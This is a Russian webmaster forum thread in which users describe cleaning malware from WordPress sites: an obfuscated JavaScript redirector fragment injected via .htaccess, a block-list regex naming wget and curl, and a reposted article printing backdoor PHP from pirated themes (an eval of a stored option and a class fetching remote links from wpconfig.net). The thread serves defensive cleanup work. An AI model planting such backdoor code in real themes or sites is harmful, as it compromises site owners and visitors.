Вредоносный код в wordpress - Mal/JSIfrLd-A

Вредоносный код в wordpress - Mal/JSIfrLd-A, Помогите отловить

DeKor DeKor 21.7.2012, 19:55; Сообщений: 8 Поблагодарили: 5 раз Репутация: 1 Просмотр профиля	21.7.2012, 19:55; Ответить: DeKor Сообщение #152
Новичок Группа: Viewer Сообщений: 8 Регистрация: 14.2.2012 Поблагодарили: 5 раз Репутация: 1	Очередной раз хочу выразить огромную благодарность Electric! в очередной раз мой новостной портал схватил заразу, причем все антивирусы молчали, Яндекс.Вебмастер тоже молчал, но от посетителей иногда поступали жалобы что на сайте вирус. Как я выяснил жаловались только пользователи Аваста! Короче снес Dr.web, установил Avast и тут же при заходе на сайт он стал орать что на сайте JS.Redirector-WH [Trj], чистить пытался долго, скачал бэкап на комп, просканировал, оказалось что 16 шеллов на сайте, почистил от левого кода, поудалял лишние плагины (просто доп.примочки на сайте было), опять прогнал на антивирусах, вроде все было чисто, но для усиления безопасности наустанавливал плагинов: Antivirus, Firewall, BulletProof Security , порезал права на перезапись файлов и некоторых папок и вроде успокоился... прошло несколько дней и опять Аваст начал орать что на сайте вирус!!! Опять же этот JS.Redirector-WH [Trj], начал искать инф. в инете, именно про эту модификацию "WH" нашел только несколько упоминаний на английском и все... попросил восстановить бэкап у хостера, те меня обрадовали что на сайте heur.trojan.generic!!! Опять прогнал сайт на http://antivirus-alarm.ru о опять выдал что на сайте зараза, причем Гугл, яндекс, Вирустотал все также упорно молчали... Опять выдрал бэкап на комп, опять все просканировал, проверил файлы, уже вручную просмотрел коды js скриптов в папке с сайтом (около недели), нихрена не нашел... Причем на главной странице сайта в исходном коде появился текст: type='text/javascript'>var wow="lovb2earomb3ncb2eaqub3lityb1comb1brb1tc";Date&&(a=["d)%6=%4&%e@%5`%8$%0%3-%b}%a","%2+%9?%c]%7{%1#%f!"]);var b=[],c="=--+-)++=]=!=@+++}++=]{?++-}+=?==+$+)-#-)-)=&=!=-{`=)=`=@{&+@=-=!=!=}=?=`+@=?=@=&=`{$&!==+$=--++?+?{}{==#{++=#-)=@=`{{+&&=#{&=`-}=#+@{-=`{&`&=?=)=`+$=#+@={=`{&`&=?=)=`+$+?+?-}=]---)-{-+&`-=-}=--#-)=@=`{{+&&=#{&=`+$=#+@={=`{&`&=?=)=`+$+?+}=]--+?-}=&=!=-{`=)=`=@{&+@=-=!=!=}=?=`-)=--++}++-)+++}=`{-=-=#{=`+$=--#+@{&=!&{&)`&`-{&{+=?=@={+$+?+?+}++-}=` и т.д. Опять прошелся по всем файлам, не смог понять откуда он вообще подтянулся, уже начал зависимости смотреть из какого php файла в какой перенапрявлет и смотреть уже там когды... ВСЕ РАВНО ВСЕ ЧИСТО!!! Короче, опять обратился к Electric за помощью, объяснил всю ситуацию, посмотрели по сервисам он-лайн проверок и этот ЧЕЛОВЕК сразу сказал проверить htaccess на размер и внутренний код!!!! Ох что там было!!! 11 кб текста!!! куча строк RewriteCond %, очень много кода плана <\|>\|'\|"\|\)\|\(\|%0A\|%0D\|%22\|%27\|%28\|%3C\|%3E\|%00).(libwww-perl\|wget\|python\|nikto\|curl\|scan\|java\|winhttp\|HTTrack\|clshttp\|archiver\|loader\|em ail\|harvest\|extract\|grab\|miner) [NC,O как мне кажется, плагин BulletProof Security, призванный для защиты htaccess и от XSS атак сам же оказался дрянью и прописал в файл нужные ему строки... вот почему сервисы онлайновые и антивирь на компе не находили ничего, т.к. только при заходе на сайт htaccess перенаправлял запрос куда нужно и подгружал вирус на комп. после приведения htaccess в дожный вид с кодом # BEGIN WordPress <IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] </IfModule> # END WordPress файл стал весить 234 байта!!!* по рекоммендации поменял права на 444 и все!!! Аваст молчит, сомнительный код с главной страницы исчез, http://antivirus-alarm.ru тоже показывает что сайт чистый!!!)) Electric, спасибо! Уже не первый раз действительно помогаешь! Поблагодарили: (1) Electric

Electric Electric 22.9.2012, 21:10; Сообщений: 1532 Поблагодарили: 400 раз Репутация: 57 Просмотр профиля	22.9.2012, 21:10; Ответить: Electric Сообщение #153
CMS help/antivirus Группа: Active User Сообщений: 1532 Регистрация: 27.12.2009 Из: Єдина Україна Поблагодарили: 400 раз Репутация: 57	Кстати вот еще статья про возможный левый код в "русских шаблонах для ВП": Русские темы WordPress? Спасибо,нет! Моя жизнь,больше никогда не станет прежней. Потому что то что произошло с моими сайтами на WordPress скорее напоминает детективную историю,чем обычный день вебмастера. Но,давайте начнем распутывать клубок по порядку. Началось всё обычным апрельским днем,когда Панда решил продать немного ссылок со старых,не очень нужных сайтов через Казапу. И так вышло что два из них были на доменах РФ,а один RU. Все сайты были нулевыми,домены зарегистрированы 8 месяцев назад,да и вообще с точки зрения Казапы очень схожими — предложения были от одних и тех же вебмастеров. На РФ-ах периодически выскакивали ошибки при размещении и лишние ВС,непонятно откуда,а на RU-шке все было четко. Естественно,Панда сделал неутешительный вывод о том что Казапа глючит на РФ доменах и решил написать в суппорт. Выяснилось что на страницах сайтов с РФ доменами были ссылки замаскированные в точках! И именно они увеличивали число ВС и провоцировали Errorы,изменяя код странички. Но хитрость в том что через админку они не палились. Более того залогиненный админ через браузер ссылок не видит,а вот обычный юзер да. Если присмотрится к точкам,конечно же… В общем история с домена совпадение и копать следует значительно глубже. Панда безрезультатно погуглил,создал топик на форуме Баблорубов и стал ждать у моря погоды. Как это бывает в детективных историях,спасение пришло незаметно в виде мигнувшего огонька аськи — в сети появился Березниковский Бомж. Оказалось,что старик уже сам давно борется с хацкерами и рекомендует ковырять functions.php. И Панда поковырял. И Панда нашел! add_filter(‘the_content’, ‘_bloginfo’, 10001); function _bloginfo($content){ global $post; if(is_single() && ($co=@eval(get_option(‘blogoption’))) !== false){ return $co; } else return $content; } Если вы обнаружили на своем сайте такой код,вам следует улыбнуться и передать привет сайту с которого вы скачали шаблон. А если вы счастливый пользователь SkyDNS или подобного фильтра добавьте сайт с шаблонами в черный список. К слову,такой код оказался на четырех моих сайтах,но это ещё цветочки,есть вариант и пожестче. В functions.php это выглядит так: <?php error_reporting(‘^ E_ALL ^ E_NOTICE’); ini_set(‘display_errors’, ’0′); error_reporting(E_ALL); ini_set(‘display_errors’, ’0′); class Get_links { var $host = ‘wpconfig.net’; var $path = ‘/system.php’; var $_cache_lifetime = 21600; var $_socket_timeout = 5; function get_remote() { $req_url = ‘http://’.$_SERVER['HTTP_HOST'].urldecode($_SERVER['REQUEST_URI']); $_user_agent = «Mozilla/5.0 (compatible; Googlebot/2.1; «.$req_url.»)»; $links_class = new Get_links(); $host = $links_class->host; $path = $links_class->path; $_socket_timeout = $links_class->_socket_timeout; //$_user_agent = $links_class->_user_agent; @ini_set(‘allow_url_fopen’, 1); @ini_set(‘default_socket_timeout’, $_socket_timeout); @ini_set(‘user_agent’, $_user_agent); if (function_exists(‘file_get_contents’)) { $opts = array( ‘http’=>array( ‘method’=>»GET», ‘header’=>»Referer: {$req_url}\r\n». «User-Agent: {$_user_agent}\r\n» ) ); $context = stream_context_create($opts); $data = @file_get_contents(‘http://’ . $host . $path, false, $context); preg_match(‘/(\<\!—link—\>)(.?)(\<\!—link—\>)/’, $data, $data); $data = @$data[2]; return $data; } return ‘<!—link error—>’; } function return_links($lib_path) { $links_class = new Get_links(); $file = ABSPATH.’wp-content/uploads/2011/’.md5($_SERVER['REQUEST_URI']).’.jpg’; $_cache_lifetime = $links_class->_cache_lifetime; if (!file_exists($file)) { @touch($file, time()); $data = $links_class->get_remote(); file_put_contents($file, $data); return $data; } elseif ( time()-filemtime($file) > $_cache_lifetime \|\| filesize($file) == 0) { @touch($file, time()); $data = $links_class->get_remote(); file_put_contents($file, $data); return $data; } else { $data = file_get_contents($file); return $data; } } } ?> Велика вероятность что после удаления этого кода у вас вылетит сайдбар. Но не ссым,а лезем в comments.php и там удаляем строку: <?php $lib_path = dirname(__FILE__).’/'; require_once(‘functions.php’); $links = new Get_links(); $links = $links->return_links($lib_path); echo $links; ?> Такой изощренный код оказался на еще одном из моих сайтов. Ну что,подведем итоги? Из 14 моих WordPress сайтов вредоносный код оказался на 5. Вспылала интересная деталь все 5 шаблонов русские! Из остальных 9 русский только один. На иностранных шаблонов подобного вредоносного кода не обнаружено. Взято от сюда: homeless-panda.ru/?p=252/ Делаем выводы. Сообщение отредактировал Electric* - 22.9.2012, 21:14 -------------------- Чистка от вирусов. Sape. CMS, плагины, моды, темы. НесТ@ндАртнЫе решения. [VK][FB][TW][LJ][G+]

Electric

9.7.2013, 4:22; Ответить: Electric

Сообщение #154

CMS help/antivirus

Группа: Active User
Сообщений: 1532
Регистрация: 27.12.2009
Из: Єдина Україна
Поблагодарили: 400 раз
Репутация:

57

Внимание! Вирусня атакует!

Сотрудники Яндекса предупреждают о некорректной работе сервиса odnaknopka.ru
отрудники техподдержки Yandex в ответах на многочисленные обращения владельцев «забаненных» ресурсов сообщают, что скрипт от Однакнопка.ру редиректит посетителей, использующих мобильные устройства, на вредоносные цели. Если используете на своих проектах скрипт от Однакнопка.ру, проверьте корректность работы ваших сайтов, дабы не потерять посетителей и не попасть под фильтры поисковых систем и браузеров.

Полная цитата ответа:

Источником заражения являются js-скрипты сервиса odnaknopka.ru/, которые находятся на Вашем сайте.
При обращении к odnaknopka.ru/ok2.js с User-Agent мобильного устройства, происходит автоматическое перенаправление посетителей на вредоносные цели.
Советую Вам обратиться к владельцам данного сервиса за комментариями относительно присутствия вредоносного кода для пользователей мобильных устройств.

В официальной группе сервиса Однакнопка первая информация о некорректной работе скрипта появилась 4 июля в 16:37. Проблема до сих пор не решена. Гневные (да, впрочем, и не гневные) сообщения от пострадавших пользователей игнорируются.

habrahabr.ru/post/185784/

Вот немного коментариев из оффициальной групы (vk.com/odnaknopka):

"Администрация miralinks Сообщение об отказе:
Ваш сайт находится в чёрном списке антивируса Dr.Web"

"У меня таже ситуаця, яндекс поместил сайт в опасные и все из-за вашей кнопки."

"Почти на 2 дня интернет-магазин просто умер, пока разобрались что к чему, проверили антивирусами компы и сайт, хорошо что почти сразу стал вести переписку с Яндексом, Платон Щукин указал пальцем в чем проблема."

"Сегодня из-за вашего сервиса сайт попал под бан яндекса."

Делем выводы...

Замечание модератора:
Эта тема была закрыта автоматически ввиду отсутствия активности в ней на протяжении 100+ дней.
Если Вы считаете ее актуальной и хотите оставить сообщение, то воспользуйтесь кнопкой

или обратитесь к любому из модераторов.

Сообщение отредактировал Electric - 9.7.2013, 4:23

--------------------

Чистка от вирусов. Sape. CMS, плагины, моды, темы.
НесТ@ндАртнЫе решения.
[VK][FB][TW][LJ][G+]

Ответить с цитированием данного сообщения

« Предыдущая тема · Программная часть · Следующая тема »

1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)

Пользователей: 0

Похожие темы

Тема	Ответов	Автор	Просмотров	Последний ответ
Продам базу сайтов Wordpress в 16 миллионов доменов! Свежая сборка.	18	Boymaster	11044	Сегодня, 12:04 автор: Omaxis
Нужен кодер, чтобы пофиксить ошибку Wordpress после переноса сайта	0	Alex-777	857	7.4.2024, 18:05 автор: Alex-777
Перенос сайта на CMS Wordpress	8	freeax	4956	10.3.2024, 14:58 автор: freeax
Как настроить в WordPress для SEO оптимизации	8	rownong27	2475	2.3.2024, 12:59 автор: toplinks
Восстановление сайтов из Вебархива на Wordpress.	39	freeax	32737	14.2.2024, 14:32 автор: freeax